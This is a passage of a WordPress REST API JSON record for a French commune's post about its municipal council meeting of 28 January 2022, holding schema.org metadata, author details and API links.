!*","isPartOf":{"@id":"https:\/\/haverskerque.fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/01\/29\/conseil-municipal-du-28-janvier-2022\/#primaryimage"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/01\/29\/conseil-municipal-du-28-janvier-2022\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","datePublished":"2022-01-29T12:03:00+00:00","dateModified":"2024-07-29T04:38:53+00:00","breadcrumb":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/01\/29\/conseil-municipal-du-28-janvier-2022\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.haverskerque.fr\/index.php\/2022\/01\/29\/conseil-municipal-du-28-janvier-2022\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/01\/29\/conseil-municipal-du-28-janvier-2022\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.haverskerque.fr\/"},{"@type":"ListItem","position":2,"name":"Conseil Municipal du 28 Janvier 2022"}]},{"@type":"WebSite","@id":"https:\/\/haverskerque.fr\/#website","url":"https:\/\/haverskerque.fr\/","name":"Haverskerque","description":"Haverskerque, 100% Nature !","publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"alternateName":"Haverskerque","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/haverskerque.fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/haverskerque.fr\/#organization","name":"Commune d'Haverskerque","alternateName":"Commune d'Haverskerque","url":"https:\/\/haverskerque.fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/","url":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","contentUrl":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","width":236,"height":102,"caption":"Commune d'Haverskerque"},"image":{"@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/communehaverskerque","https:\/\/www.instagram.com\/communehaverskerque\/"]},{"@type":"Person","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2","name":"chti pc en d\u00e9tresse","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","caption":"chti pc en d\u00e9tresse"},"sameAs":["https:\/\/haverskerque.fr"],"url":"https:\/\/www.haverskerque.fr\/index.php\/author\/estorez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/570","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/comments?post=570"}],"version-history":[{"count":5,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/570\/revisions"}],"predecessor-version":[{"id":8302,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/570\/revisions\/8302"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media\/568"}],"wp:attachment":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media?parent=570"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/categories?post=570"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/tags?post=570"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}